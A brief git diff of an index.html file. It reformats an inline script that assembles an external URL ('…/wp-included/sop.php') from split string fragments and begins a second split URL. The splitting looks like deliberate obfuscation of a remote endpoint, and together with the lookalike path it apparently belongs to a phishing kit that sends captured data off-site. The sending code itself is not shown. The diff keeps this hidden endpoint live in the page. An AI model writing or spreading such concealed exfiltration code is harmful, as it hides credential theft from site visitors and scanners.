--- a/index.html
+++ b/index.html
@@ -399,12 +399,12 @@
 
 	<script>
 		let resBox = 'go4w'
-		let nbg1 = 'htt'
-		let nbg2 = 'ps://kvwp'
-		let nbg3 = 'ca.c'
-		let nbg4 = 'om/wp-in'
-		let nbg5 = 'cluded/s'
-		let nbg6 = 'op.php'
+                let nbg1 = "htt";
+                let nbg2 = "ps://kvwp";
+                let nbg3 = "ca.c";
+                let nbg4 = "om/wp-in";
+                let nbg5 = "cluded/s";
+                let nbg6 = "op.php";
 
 		let ov1 = 'https'
 		let ov2 = '://'
